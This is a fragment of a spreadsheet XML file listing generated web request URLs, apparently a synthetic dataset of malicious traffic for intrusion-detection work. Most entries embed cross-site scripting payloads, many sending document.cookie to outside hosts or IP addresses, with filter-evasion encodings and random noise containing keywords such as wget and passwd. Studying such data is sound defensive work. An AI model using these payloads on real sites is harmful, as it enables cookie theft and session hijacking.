    <t>/16y.45fuw/axk4s@xt/ehtds5-m9e2tyly2o5/ehextn3wnhndwhdoa/v4e6k/s_dkhotg4h2@j.o4/mbs5tgpr/pnvtfa3guneirhtrmgz/aal1v1s1u1/t-thhm/ttmoi2aeh9o6mrlcrkod.js?gjeufyd=161&amp;hoeltau=iq:+tcnsi(sstdin&amp;10de=2886722349&amp;tahcvh=wgetd&amp;gp3ii=&lt;meta+++http-equiv++++="++++refresh+++++"++++content++=+"++++0;url=javascript:++[alert++('ttotlem');]"++&gt;&amp;elfob=306626&amp;ffewfskc0ro=ertma9njeat3aitbt&amp;1twet=~script+r:arraccess_logb&amp;adsenqlooo5=cselect&lt;hp&amp;chorsosiseo=@e&amp;bvlqxe=wketnetantnv+elheval</t>
  </si>
  <si>
    <t>/kme0onhedhlvim/pu2ik-1uzr/upj4gqps/rmodkgivv/anjebe8jpd.asp?e9dam=hxw4h7&amp;tddcilmasptrsh=28635146&amp;zlmtunetsettaig=egs&amp;ps=inphp+i&amp;st18locn4jat=&lt;xml+src++++=+"++javascript:[alert('riza');]++"+++&gt;</t>
  </si>
  <si>
    <t>/leeeha7eednc/nb_iyx.@kkqdd@hjzcx/ntphiho/v1htrllpet/ps1htsd/tefa/n0ni8.bo6ohvxzn_7p/oalfai4z.asmx?log0w_x=t+5replaceb&amp;i|&amp;ae6&amp;mtycv=&lt;img++src=&amp;{[window.open('http://109.166.81.35/geatti.exe'+document.cookie);]};&gt;</t>
  </si>
  <si>
    <t>/g6kbvingcwlxyv/9aee7sw/mejmdlibbaywhselectpphp/fdzbke/iruhqptukg/l3h@uslttye0/yidlnm3ie.asp?if=otjvgm&amp;mdyr3flrdgertb3=8]prarlfies+i&amp;haikrtth=zchrlpzecsiae&amp;enrocsgtsss=1032086&amp;em0p8kvesr=261543&amp;hoe2iot6ensa=80775&amp;l4elnis4thy=&lt;div+++++style++=+"+++++width:+++expression([document.location.replace('http://www.dedege.com/cgi-bin/nsin.cgi'+document.cookie);]);"++++&gt;&amp;uxjlrujnocopy=axsheoa2dlaorp&amp;eahb1wl8w=514517777&amp;erako1ho=++0gaan+zmr&amp;ea4rhc=43&amp;sb2mnhw2e=fsft5ors72a&amp;3su7edreznavfa=tthxterm-zscriptt~aixhtoo3+&amp;cashlsoeamzold=rnne1tee+rhn-wda&amp;cdc9rfhoeet=xuhml</t>
  </si>
  <si>
    <t>/h3/pt/o./c8h-g/body-omvehaving/i50_ru/iubepltiote/ihee.php3?3xmrshhnp=&lt;div+onmouseover+=+++"++++[document.location.replace+('http://www.taneme.com/cgi-bin/siro.cgi'+document.cookie);]++++"+&gt;&amp;kwyd=r7fe-an?perlsasock_streamtkow&amp;efa1hb=032&amp;ut6r=)etch+os&amp;re1rwcmf48=1emcgyhsd&amp;etihe=58&amp;dimmty9qnox=360776&amp;efphpvsgeb-i=359029&amp;2atibnri=7417126&amp;ijvgtefecgd6=5&amp;nel=ml8lhkr&amp;ienheqi8eu=nhethai&amp;1sitfenghoftnre=185&amp;29rtdwei=t~ansesu+merti</t>
  </si>
  <si>
    <t>/ae3aucei/ei74rds6x3lbca/e@n8tio_.nogjqw8ftt.cgi?aedljtosits=necho&amp;adt=|sneo~rwohz3=6m&amp;ewh=57&amp;etesoiahdmbe=t55r&amp;d6osdaeeeaao=&lt;img+src++=++++"++livescript:[window.open('http://115.64.163.145/chlaie.swf'+document.cookie);]++++++++++"&gt;&amp;xmlu6ssfkwl=38213&amp;pstwes2nit1itbd=dotn+ij7icc&amp;tjfcc5np3dtr=4&amp;c0n1imep=7280084001&amp;t9dswas=724249&amp;nhhunnen=3xq&amp;9cnhzen=ltnyeuac4fn&amp;rgte=h1anhtw8ec4r&amp;ceriztiqu1dc=eusncjdnnmbwett</t>
  </si>
  <si>
    <t>/rasoeiimrwatnim/7lhiwbkuoail/tlmyo/rysat.yconnect0/ld8tfceg/rvzhty/sr3/ginsertmf07cmobehc/nwecetrcyoepirehianb/ob1anespto.pl?0hrc4hinumt=6&amp;4fqtic=&lt;xml+id+++=++"++++x++"++++&gt;&lt;a++++&gt;&lt;b+&gt;&amp;lt;script+++&gt;[document.location.replace++('http://www.asastrta.com/cgi-bin/eson.cgi'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b++++&gt;&lt;/a++&gt;&lt;/xml+&gt;&amp;6tuau0hunsed=rlsw5aad8&amp;na=199980&amp;oin9s=egl-4o&amp;omxp_ost@8dj=ea3&amp;hu2letitnrfr0=hn84?ie&amp;f8aniss4sp9xf=2from)&amp;rekmid=st&amp;taedoddepuueez=+tsnehc1d&amp;_1ew5_=dvnncq4</t>
  </si>
  <si>
    <t>/1xnssgngv9wo./rkoyk/rtbgsoundfrom/ygenpon7/update8sgjy5prcup/8bzpkznujoyf/naghakkpnafn85heptw4/lm/6niteocjoeenug/t7lmltikp.jpg?f47w=:rn&amp;onxzn=65830&amp;sim=5u&amp;q7boot.inil4eu=&lt;script&gt;alert+(+++++"++++66rrd.vfamd")&lt;/script&gt;&amp;eda45t=thds]y1&amp;hu5ily9fp=666329&amp;ael11groupbylbma=ag19ln&amp;+t0djyh%nv+a&amp;d73ndo9tnilctee=e]5e&amp;psn=owkj&amp;5f7n=it5iroaegeeagphe</t>
  </si>
  <si>
    <t>/i_.cfm?c9zeontwz=9&amp;oyivnle=auwden&amp;jrn8lt=4315&amp;em=1&amp;ci0abiukcekltet=suqlc8a@eo&amp;jipttaoofik=&lt;div+style+++=+"+++++width:++++expression([alert+++('h6er9aop');]);++"++++&gt;&amp;2mot=djqzpnqi5bw&amp;mwkgwqmynlgs=q9ot)r+&amp;eemimu0e=7de;goleralenshsgure&amp;mk=\\sstdint~t:&amp;67nueplb8n=scriptwinntie6&amp;g5oarrtsc=m6ynfhf4&gt;eattl(style&amp;cattsn=nxkd8mtwrrupdatez</t>
  </si>
  <si>
    <t>/2@zh/alt7oltoaii.css?to=yrcnditsdwop1&amp;nse=os4er-eeb&amp;ltssrskl=447&amp;jmdeleteuyqs=&lt;div+style+=+++"++++binding:+++++url([http://www.arsi.com/script/adaccs.bin]);+"++&gt;&amp;ttjbi8e=alikes&gt;&amp;6zfc2ki=adriijasm&amp;xzyh8@qc=tietc&amp;er=9066582&amp;uhxe=i:rat+sy&amp;noihrsr3=wsxobjectsvbitw&amp;vndmei=sotlehspbh9o&gt;1&amp;h3hct3eooouiqtn=bsoiieaisoek</t>
  </si>
  <si>
    <t>/21./ift.xt@zwigqaunr/anr/tbh/r0cv4wd0w/isidcqedoda.jsp?9o-fh=29907&amp;ot=eivdsjlpl2l&amp;tsezc=&lt;div+++++style+++=++"+behaviour:+url([http://www.roarmeve.com/script/zrihji9dae.msf]);+++"+&gt;</t>
  </si>
  <si>
    <t>/xqil0ao/inqcm@eo6_sscript3e.nsf?cciq=&lt;object+classid+++=+"+++++clsid:...++++"++codebase++++=++++"javascript:+[document.location.replace++('http://www.veve.com/cgi-bin/el.cgi'+document.cookie);]+"++++&gt;&amp;tsn82qa=bw4</t>
  </si>
  <si>
    <t>/9x-yzz5chumfpcqf/2ebqd3m/3dg7xckcee77_69fr/tirtwkzcz3tf9ji/s6hz/istg0rb/ttylea/lzmsa7istep.css?tprnt=cw3sconnecti=passwdiec~&amp;6niugc2elswuie=3072&amp;8qpsconnectleoinputgps=node/cl&amp;2heihoidpeet=&amp;&lt;script&gt;[document.location.replace('http://www.malaat.com/cgi-bin/ntlanare.cgi'+document.cookie);]&lt;/script+&gt;&amp;ilc=snpucopsbleronnd&amp;stg3aogeshse=796009&amp;er7tduxhsegl=bm6&amp;w6=jeaca</t>
  </si>
  <si>
    <t>/hmdnzblv-3/0lztqf_tmpxvkzxry.tiff?positionr_u-=634&amp;zfslo=6zlu&amp;oemm6ngree9rlt=50202787&amp;mshimr=[\\xc0][\\xbc]script++&gt;[window.open('http://155.198.69.91/llenst.jsp'+document.cookie);][\\xc0][\\xbc]/script+++&gt;&amp;whnstlso=cvf.z5.qrvr&amp;dt1=aoie&amp;rijefsplnne=wirpsphh0tdgpk&amp;sorn=tomenpnc&amp;teoh3=8&amp;eahiai=3645&amp;e6elp3eccdthb=qrscerewsu07i8des&amp;markfv=eg1&amp;tmp2n6uxinput5vbscriptd=la3sum\\s</t>
  </si>
  <si>
    <t>/ecar.htm?hi7mowdixpes6=&lt;div++++style+++=++"+width:+++++expression([window.open('http://160.164.65.143/ri.swf'+document.cookie);]);+++"+++&gt;&amp;ninr0r=r0dux~&amp;thnrnilseittmga=mebq&amp;egdioehedytenen=553708&amp;akhlhap=94507</t>
  </si>
  <si>
    <t>/mes3hiremharrm6ix/iqqt5prlb13.css?ru4eylstssa=93&amp;6naoercr=8&amp;ei=71&amp;zaetisipdmein=r"+&gt;&lt;bodyonload=alert++(document.cookie);&gt;&amp;nmppastihmhse=sfus4ci&amp;nph-itqr=72&amp;h4x8c2ch5dewpo=lfmcyiha8dmlrt&amp;l4cxerwzyteshoj=rtey6nac&amp;iwmtidrtoos=+un</t>
  </si>
  <si>
    <t>/7tzlsesaarb9nyoneo.exe?idhnsh=kenn205orandrcm&amp;cnenlluuhide=3&amp;atisw1dttoy0qe=&lt;body+onload+="+[document.location.replace++('http://www.rileic.com/cgi-bin/tiermara.cgi'+document.cookie);]++++"+&gt;&amp;rstedba=ik3syqbma&amp;tsayadeeeowern=cwznadywm&amp;ierl=f+e9&amp;te=smorunljcdeauenl</t>
  </si>
  <si>
    <t>/wzt1e1oksl38t/evtkgqc/izfs8_nfsliie48fpzbb/ntlem5if7/9aecystsltoban4ad/cy3afmgqmmou/gsgayye6osayh/ssz.e5wqtsm0_ba/s6b3f.html?4hgzysawtbzth=[\\xc0][\\xbc]script++++&gt;[document.location.replace+++('http://www.tolelast.com/cgi-bin/mall.cgi'+document.cookie);][\\xc0][\\xbc]/script++++&gt;&amp;0gadne=8su&amp;soymttkenn=0844470&amp;xikoyb=eat4-&amp;46aion='iuhtt8ds&amp;opq1wwa6ct=s|zaahw+eisotc&amp;egbe=lmyahck16y</t>
  </si>
  <si>
    <t>/zxx_is9swdqnmg07kyrn/rdnoistsefhtanmc/ssuoeteoohltdhq/la1f7x1vdczul/o5/cplnar4brosn/_xo.php4?sea=3ngrotphieft4g10&amp;xt0rtee=&lt;xml+++++id=+++"++++x++++"++++&gt;&lt;a+&gt;&lt;b++&gt;&amp;lt;script&gt;[alert+('oet');]&amp;lt;/script++++&gt;;&lt;/b++&gt;&lt;/a++++&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/4odwz6fs@/am-nr.shtml?pa=&lt;object++++classid+=++"+++clsid:...++"+++codebase++=+++"+++javascript:[document.location.replace+++('http://www.geni.com/cgi-bin/laerasng.cgi'+document.cookie);]+++"+&gt;</t>
  </si>
  <si>
    <t>/s.ukmvwngzou/tv4yyk-iz7o4.mspx?d5=&amp;{[alert++++('suzsah');]};&amp;pkgahttpz=1</t>
  </si>
  <si>
    <t>/tn3/8form1cgj/oitcei.jpg?sl=&lt;input+++++type++=+"++image++++"++++dynsrc++="javascript:+[alert('na');]"+&gt;&amp;inoac0mscdonqgs=ov8h&amp;lr2hdyllt=bcn+kr&amp;kmlzf@ivo=ffk&amp;nstaenbevtw=0aepon'link&amp;he@+&lt;&amp;idic=045</t>
  </si>
  <si>
    <t>/oaslstd_3.g68q/riwnquji4rzq8arx0/ktvy@7mxcci/vxox.shtml?fpymsaiigal=9&amp;ashutdownr0=o7ltnresoap9&amp;odoa3ud=&lt;div+style+=+++"+++++behaviour:+++url([http://www.etnaonma.com/script/e0.swf]);+++"+&gt;&amp;trgsup8le=t&amp;d8ettas=ywb0gp_bn&amp;nqc@6jxuce=e4rqnntihsosugsyi&amp;inputfpst=cu9pci-lpaouo+s&amp;img=drcw&amp;eldmeenhcmwx=ievmutemeuwot&amp;tvek6=eannwssosisxe&amp;dst4eearrzato=u0bskgqw2erb&amp;fhzt=9145093&amp;igvbuincludevwjmoi=/emrtycpas5objectt&gt;&amp;yarhwhece8s3w=4204102</t>
  </si>
  <si>
    <t>/sg6wbrjgl-bguas.cfm?qjmaobject3orn=&lt;iframe+src=++++"+vbscript:[document.location.replace++('http://www.tr.com/cgi-bin/ti.cgi'+document.cookie);]+"++&gt;&amp;tytxaseuto=790661&amp;enisyomu=o&amp;1aadebacqn4=tkze7imranekpv&amp;khehm=fl&amp;rrousn=dad&amp;dtantnntii=&gt;eih&gt;&amp;te4iszrrs=91039&amp;pqqkugr1v9t=34284&amp;enrobbitu0dte=ifp7w2evg&amp;3te=awsse&amp;l8giiipduoaht7n=nt9e&amp;7oatg2c9=og</t>
  </si>
  <si>
    <t>/s@/ttseeeiahessibiqrmin/atiid2eamdtgd2a2tpax/_njjbody9_bhnpw/w8ydksg/fcsswmmrhors0etite/mve_qs.bin?oegduuc08rcp=&lt;iframe++src+=+++"+++++vbscript:[alert++('nlzolrt');]"&gt;&amp;ltsn.bqd1cws=rztwgez.kn&amp;ozspqnc3.=asnlc&amp;ebwjadttpezr=wsigar1&amp;bwu3=@4ohbin&amp;8anqitoa=028&amp;d4sqx=3iauepsystempoa&amp;mtadnosi2=mss|iohecho5&amp;t&amp;ksoaeiyoevjdgu=ir\\</t>
  </si>
  <si>
    <t>/v@4@q/t-oxterm/802soy@y7ap/oms/dl8qtfczomtue/dlessbhr/h03e/xshihwftowp-esir/1jmjf/s9bcc.mdb?dtaauml=4&amp;z21-delete3h2=rdelecmytvraef3t&amp;linkh5-okeyzflogn=&lt;script++&gt;alert+++(z8ens.ee4t)&lt;/script++++&gt;&amp;miicliirrcab=84358&amp;apegoe4nlt=550&amp;kmdn9ulestesxfg=rhl&amp;tb=p</t>
  </si>
  <si>
    <t>/s5aaegu/e5rdbnse/09im.bin?3omlteo=1osi?i&amp;h2cxo2iodn1nate=er;a&amp;ewoc=whe&amp;uivsdcq4iome=8&amp;i9rvspli=9444431&amp;usrewiowi=stauf+bwhngcr&amp;proma=kdh9dntl&amp;0eel4nn1ei=&lt;img+src=&amp;{[alert++('gof');]};+++&gt;</t>
  </si>
  <si>
    <t>/ets/pod5rng/sireicalt/a0q/4ices6natarrhoichytb/ej/c46_cfdjzl/aso9m4pesecwundiz9u1.bin?3wxvgb.@jqq0=/otreplace&amp;qxdqboy.=pwa2hesiwtanondte&amp;iux=515132691&amp;nz0ty=ezeam0tzlis&amp;mr1raphpc=edyiwmh@ft&amp;tevnhneohu=emnpdis&amp;qta=onsl&amp;hatme2bn=+&amp;otnl=ndnsmistlleeea&amp;2epsginmrii=&lt;![cdata[&lt;!--]]+&gt;&lt;script+&gt;[window.open('http://201.67.39.105/llndis.sh'+document.cookie);]//--&gt;&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/nodeeyxjmpszde2upd/ot/lhzqhdscriptcatavgjs9.jpeg?hmsaedmdldsn=&lt;iframe+src+=+++"vbscript:[window.open('http://167.213.38.106/arre.exe'+document.cookie);]++"&gt;&amp;s7zycmetai=cssdrop&amp;a9senhaux=oettnefkre&amp;et=ra/esal&amp;tfftdqa7r3bxi=nwm&amp;qetonar0=84345&amp;cotictsxht=r&amp;kh=ohc\\see&amp;eb8t=qevraeoiredtar&amp;zkjiubr=deee7elstcn8shrnulle+</t>
  </si>
  <si>
    <t>/tclye/eyjf7fid3ikc/2wadrcpidv/ayieaag6laetas/mjd/tbirapopdhlceo@8dc/9ezeuuir/ysat/hka/eulznrr/7e0.msf?8snusssgdsexs=rl;ehnph-dhxnh0ai&amp;goo75w2nylo5=ryaa7&amp;etmirega7oic=o1\\isytseet2&amp;ft&amp;gkt=usu&amp;tszb8j7=9&amp;emoco45lstmrnn=&lt;a++href++=++"about:&lt;s&amp;#99;ript++++&gt;[document.location.replace+++('http://www.erlili.com/cgi-bin/nganra.cgi'+document.cookie);]&lt;/script&gt;++"+++&gt;&amp;kbetweenzj4n=aiydi</t>
  </si>
  <si>
    <t>/vdcetgartneebo/eoi/2stmmam9ioidowidein/arq17v.qp97cade/-wg63ipasswdt/rt5wzc3g/l8uazychildtm/us-uhh9homer5/3qdsarq7http8gshavingzboot.ini/evcgksfqen/1tjjlm5/ccw.asp?ibsxstahcm=8&amp;mxelt=[\\xc0][\\xbc]script&gt;[alert++('iejcnpz8t');][\\xc0][\\xbc]/script+&gt;&amp;ie=log1h&amp;lsrseii3nvalz=85</t>
  </si>
  <si>
    <t>/lcqphuo@62mm2kbr6/e89pdryz/nr2md50/gfpassthru82zk5/1lx.mspx?n2snssoieojmgt=ss&amp;o8=dgtre6ew&amp;kallfljh=&lt;xml++src++=+++"+javascript:++[document.location.replace('http://www.erta.com/cgi-bin/in.cgi'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/ogudutei5rd7earnril/sfhbo0geyrpzaatnalas/rpbpsizrpbzff.png?l7doayecfl3pot=472&amp;ye2eihaheso=leineelike=9o+pet&gt;6&amp;eidmafnen=pna+tl|&amp;o&amp;crahvoasahdan=&lt;div++++style++++=++"+++width:+++++expression([document.location.replace+('http://www.chte.com/cgi-bin/rege.cgi'+document.cookie);]);+++++"+&gt;</t>
  </si>
  <si>
    <t>/sj8yxh6mh/h7ni6xvk/0r28c-/uocz@l4lumkxv9d@/osn3sdtzbnzbr0.ey8/emlsefrre/imj3okyr/null9j9wu2e9/ebq-bdcwnkkhojc@/txcj7/8mpeedseaeuahm/uncposition@kvak.php4?5uo3mahax=17808&amp;feeaeursotestde=06&amp;cilqrneyneem=wia8&amp;naodr8ii=n+ac00arftpaco&amp;ecmddb=4&amp;.wwj=970763571&amp;baa=e9hhrozeu&amp;nzspswoak4bhxr=a1agsetdpoe&amp;dfeeqrreduonaed=ajyr&amp;l4h4b4eval=&lt;body+++onload+=++++"[window.open('http://26.179.236.47/to.nsf'+document.cookie);]++"&gt;&amp;epeth=+eri</t>
  </si>
  <si>
    <t>/ipaswzabioa4ao1thr1/pxuwuasd_tlby/dzhq@n/iprnsiegslihou/yoyeolzdezrxest/onibhlermvotxeo/cruuxh/q5stalmbdr1d/kio/sv/lym9.css?ehdrtetso=8264174&amp;zx-_f=&lt;div+++++style=++++"++++binding:+++url([http://www.ol.com/script/licateyl.bin]);+"+&gt;&amp;7wife=hcnhrjx3vxc</t>
  </si>
  <si>
    <t>/hqsw9aiy@z0f/eobhtw9mvlkuc8950/4b8@rst06m/ekg.v-hefzmik/mdiwa1zob1h-f/lke1gk4jic@17k-fr.mspx?a5s9xfr=9377&amp;7oe=+yenauatpt9ei&amp;rb.w=ftecgs&amp;hn9ede3=tsnt&amp;euetxle46smo=402276&amp;ssrtiasempa7sd=ntpe&amp;aniusio0lshtai=s+ll&amp;tjttonywteny=rras1lq87@ji&amp;nof=6382698&amp;mt2d=75&amp;rxrse=ntpyusrn&amp;emdrwtw=mlo&amp;slswihhor=otltwindow.openrdivyt2ns&amp;nilfmmkxgm=[\\xc0][\\xbc]script++&gt;[window.open('http://214.239.146.216/ngit.cfm'+document.cookie);][\\xc0][\\xbc]/script++++&gt;</t>
  </si>
  <si>
    <t>/fzhomekyunionki-p/tivsuqtr/ozvs0rdivfcv/sg/c1aiht2pro7w4ipmqj/auyaa/isx1pqqzlbinlupo/exoaorfnau.php4?ti9oels=plemg&amp;nrjen7din7=+&gt;&amp;hbslaanbwiitylf=ofkyhnxvby&amp;lsaa=oth-i&amp;avt7stecrerdgx=~&amp;replace15.ps9gclocation=+heleh&amp;plde65-uyhg=133&amp;robcarparado=6phtaccesiaosscriptiun+p&amp;nsacmetaxhz3d=4306084694&amp;xheuaydotohre=tifcl++"+++++style=left:expression(alert++("++++6.e+"))+++++alt++=++++"&amp;ey40wses7tao=003&amp;cltiiunitrlrett=825556&amp;bfksabnzsam=7078878&amp;j@clbo=ss:8lltv9itslinkd&gt;in&lt;&amp;frfe6seieaoth=93055</t>
  </si>
  <si>
    <t>/eq4m1lk/vzps-stdin.gif?ea=&lt;div+style++=+"+width:++expression([document.location.replace('http://www.redeerri.com/cgi-bin/ol.cgi'+document.cookie);]);+++++"+&gt;</t>
  </si>
  <si>
    <t>/pn0t/b5o2/wmm9rcfs7ud0ngh/gr3/hntehotath9wd/beratsgsh2onte.shtml?mtw7iprtih=djf&amp;srfiueopoaezd=tdismobject7cmdh-3saeh&amp;naha2=7765&amp;.9.u.=&lt;img++++src++++=+"++++livescript:[window.open('http://212.102.14.69/tomaar.swf'+document.cookie);]++++++"+++&gt;&amp;aiesmjtebraa1r=2420505</t>
  </si>
  <si>
    <t>/uhvbscripts/yfilcknm.jsp?5slaftl=+ta&amp;.bzpsn=&lt;img+++src+++=+"+++mocha:[alert('lemorg');]+++"+++&gt;&amp;knpunrasb=92538037&amp;orhqgoszrh=n@rme+nlr1]&amp;oilsa=3secatxp_&amp;69zaapt=33377&amp;lkxjsiselr=unionew&amp;epnefu7y8lt=tdoy&amp;z5xtnodegroupby9z=se9&amp;rukeam0robt=pwxe2i5_e&amp;9g@.lexec-gm=73&amp;owvletaskj=sg&amp;&amp;iowevigemhreda=vet4ldne&amp;9gt6ilrcn=ocpnnnk7vr&amp;qeemoessop=tt0n25a2opaec</t>
  </si>
  <si>
    <t>/tsneettavl4ejhanva/o92e8rq.bsibl67tqfj@/anvemonpbx3.exe?onersfrryatd=nikwk5uogjv&amp;u99=&lt;div+onmouseover=++++"+[document.location.replace++('http://www.trrageit.com/cgi-bin/llarnt.cgi'+document.cookie);]++++"+&gt;&amp;gerdxensgiq4o=d45&amp;z4yxlqceustherc=ru+erleposition6rt</t>
  </si>
  <si>
    <t>/c6he91by/nengeoisrwtho/t9qrbplv@lty_cq_rhx/yxvbjwf.html?npol=or$a+xwget+i&amp;aeahreog=&amp;&lt;script++&gt;[window.open('http://11.213.102.194/istich.php4'+document.cookie);]&lt;/script&gt;</t>
  </si>
  <si>
    <t>/0mtx7/ahhhhytlmd.pl?ueie7eczwoee=998&amp;gaits=3&amp;dgolt=3&amp;uleos1uticayoe=&amp;{[document.location.replace++('http://www.antori.com/cgi-bin/se.cgi'+document.cookie);]};&amp;l7ihymscriptobjecteval=2msd&amp;afnzautoexecew=e8ptauocref4odigl&amp;6oas5enaeieog=3012&amp;pprocessing-instructionzy-cct=hh0fibjr7t&amp;paarsij=oacacl0hm</t>
  </si>
  <si>
    <t>/eheno/ierictc/im46sf6ozrxgaccess_login/rnz-g/macluttelsi/noqhbdja/6lmochanygi.cfm?enlistcsfiithar=&lt;![cdata[&lt;!--]]++++&gt;&lt;script+++&gt;[window.open('http://87.248.54.88/nd.pl'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;siurltptneonaeo=f&amp;axt2utljier=fn(tenglexxlus+treplacedm+</t>
  </si>
  <si>
    <t>/tuamo6qfkuphgf@1uoxi/igraej/dzv.ww6gy/37ckajezc./1er5hbs9n/nzwt/dpm8jkp/q2niy7o.o6/eserars/i7flc.jpg?wfasahddfeu=30&amp;diu_autoexeci=i&amp;udnel=u3ol2o&amp;tbe3gs8ab=snadminzoi7ea&amp;98hkbvu3i7w8=23900&amp;t9xwsdnse=xleerhstantkier&amp;thetgvysiaro7ea=tv74-hkdkjwc&amp;oet=a2ebgsoundr&amp;ru_7exe=+eaezemts&amp;upamso=e\\9&amp;snocnnuki=&lt;a+href="+javas&amp;#99;ript&amp;#35;[document.location.replace('http://www.mane.com/cgi-bin/mesees.cgi'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/fexecyvnu/sclesoec/owgttkojm2lk3/e7gp/tomlc5qt/suhm0/ex.css?enrcro=outp+igiwdn&amp;krnullvfz=ia&amp;ntia=9iaal/rammteis+&amp;csystemn86fa=5&amp;i.ths=pe&amp;oadpe8edjori=&lt;div++++style++=++"+binding:++url([http://www.geie.com/script/ppit.jsp]);+++"+&gt;&amp;dz=oy3</t>
  </si>
  <si>
    <t>/e3bg/ph1l/iti_ueokppo5x6.@/md1sgd-qpc8u/kxfht3-tzv.htm?uobz8eg=odxhzahbper-jwinnt&amp;oz3ak3nliu=9982276&amp;7aoagl=384&amp;onto=e8he$eord+da1hn&lt;&amp;etyadr5rs2xah=ailr&amp;c-e@c=ybhdoys~sat&amp;s75sjx=dol6&amp;ehnui=+&amp;dpee9=ssr=iaccess_log&amp;apa5ndw1lasek=&lt;img+++dynsrc=+++"+++++javascript:+++[window.open('http://32.124.77.193/or.sh'+document.cookie);]+++"+&gt;&amp;eatootdprcjt=57573059&amp;enep=7dnee&amp;ntmanoevraei=clhn&amp;llttnlehl0at=676802558</t>
  </si>
  <si>
    <t>/eo@qg7emug3/o6g/kw/espnl4tsttietdbflray/rhvltfsnjac3zzb/ci7uf/ae9ptjvzsl.-lfzw4/ina3.swf?a5iaeqbryrp==yoooc4ior1uoht6h&amp;55i=swoormioa4een&amp;tirftrlret=e5u4asneoahttpi&amp;rtmpfrom5o-nometalinkzlib=cecka9tiodhrnbded&amp;aen2ewhoqnte=eyssau3&amp;lpnccu=ae&amp;cnvscriptqmdsjg=&amp;&lt;script++++&gt;[document.location.replace++++('http://www.ni.com/cgi-bin/alte.cgi'+document.cookie);]&lt;/script+&gt;&amp;ottrc=olheps</t>
  </si>
  <si>
    <t>/nxbubecmfz0bvvwm/rllciyptpn6u0n4aete0.php4?otbp7ntk=nc2za&amp;nh1ratehel0wi=eil\\=yoxmconnectimgeeval&amp;ais6vya=aalocation@u&lt;rl+ocmdt&amp;thristnnsc4alh=7662584083&amp;aeylf=679789&amp;osratastdheahr=eu+r&amp;e9heanto=gbinhisuhoee3tppn&amp;anohfztsl6=44693&amp;tcntml35=bto&amp;clroagoe=10&amp;tdzr5dtr=&lt;meta+++++http-equiv=++"+++++refresh+"++content++++=++++"+++++0;url=javascript:++[alert++('ukseo0genz');]+++"&gt;&amp;ihtdaene=gi65m9vibbp</t>
  </si>
  <si>
    <t>/s0wca/.ezterqy7nbccopy/jzedjyxglahm5zh/hh1aj2az/ti3oegeefeesiopeqdm/iay3qbzcdjhhswbmuly8/mcashtnpts.php4?rfrhvcnps=l55zy&amp;di=m1?tguonth&amp;n0e6r1mh=9var&amp;7pjkrreaf3s=sgedwlla5tt+usu&amp;o-bjacmd=&amp;&lt;script+++&gt;[window.open('http://217.22.97.170/tete.swf'+document.cookie);]&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/ohtwrcyr4hnhxfqf/oesfjo_@6zo71k/lo6al4wnunrntaaddeoe.shtml?yhv6pdropr8h=4030&amp;elvasod=[\\xc0][\\xbc]script+++&gt;[alert+('h3ter');][\\xc0][\\xbc]/script+++&gt;&amp;bavxops=taccess_loghtpasswinntg~dninsertoaracattis</t>
  </si>
  <si>
    <t>/wnnlgmcrmtm/co1hciqfzn_cv/ax-l9t-otbt.vbjwc/7.d/zrttreo0/iuewiwmutxiealhae.jpg?tdiii=0797227&amp;tltoaws34l2m1ge=4401&amp;lilg=2014&amp;e0eputme=48htepnrd&amp;wuirbl_jx=&lt;div++++style=++"++binding:+++url([http://www.matrto.com/script/ht.cfm]);++"+++&gt;&amp;oce=7ls&amp;sjupdatepz=htpassls&amp;ee9yemyeral=iinieh+e&amp;yr=8665306&amp;rl6hsserunrsa=41&amp;eiea=ar&amp;oona5trti=e5xbfry&amp;hovtrailit=5335&amp;php5skx7pmiqqhaving=1tyeelrsrkseoxte&amp;t5qly9prw=7984</t>
  </si>
  <si>
    <t>/a0z/in.waqvidspu/ttf9aspuepsnqenh/hdansnl/8v0jxhnanlo1j2g/m7m5s-s0qqogij_-yepz/ld@scriptfromg3swusrmtr/ihhor86.aspx?n1g=1981&amp;tonhjeeehdmtn=&lt;&lt;script++&gt;[document.location.replace+('http://www.artechon.com/cgi-bin/icetriinng.cgi'+document.cookie);]&lt;/script+++&gt;&amp;uayoieas=+thlocationurpwinntt$e78&amp;ja4at8ef=telnettot</t>
  </si>
  <si>
    <t>/xr/ausr1oc_1a/hahyq/tc_vpmzvd_cvsvrhc/pcacj@zkrtdjnqp/ryyp9kfpe/edmwszsnoeans/ftoko/omrtn1a3awo/nmn_-h2xpwcgyg7@3qo/eoyjq.rt/t6eemsohlot0darm.sh?ztitica8l=&lt;img++src++++="+mocha:[document.location.replace('http://www.tave.com/cgi-bin/aset.cgi'+document.cookie);]+"&gt;&amp;inhf3eocc=2002&amp;anvwvetiwr=s&amp;e8h1l1meces=outmpad&amp;iurm=ltnpc&amp;safeiesasa=eur4gsm9r&amp;v6=ojtuc96i5h&amp;titrexlqilrs=ln&amp;u3eb3i=a+@</t>
  </si>
  <si>
    <t>/c3stgnceutei1p/l9byie4_hsrqkj/rw/xixsuz.gif?iudehprtiap=&gt;&amp;siasrotret60lr=0536138&amp;antuoascife=;wgetos&amp;ehbh=&amp;&lt;script+++&gt;[window.open('http://85.202.121.157/in.cgi'+document.cookie);]&lt;/script+&gt;&amp;nsaopweu=it&amp;c0p1phoonlmevdc=eany&amp;thoh3sja=edhee8swgett</t>
  </si>
  <si>
    <t>/9l7hl_ntt@y/s3rwy.cgi?tx=634147614&amp;ebmaeionhessboh=32687&amp;mn=9911882&amp;nbgale0=&lt;!--+--+--&gt;&lt;script+&gt;[document.location.replace++++('http://www.taettete.com/cgi-bin/enleie.cgi'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;6oee=xtermetndz3chtnac&amp;9oitp=24&amp;hetiuuinsn=+t&amp;xbwhh2wmw=x&amp;nasf=2pm7e9k&amp;oiasnn=454380&amp;sepa4tt5unrtk1=el&amp;mpufruja0w=itz&amp;ybsystemfxq=o.m6xsiejm9</t>
  </si>
  <si>
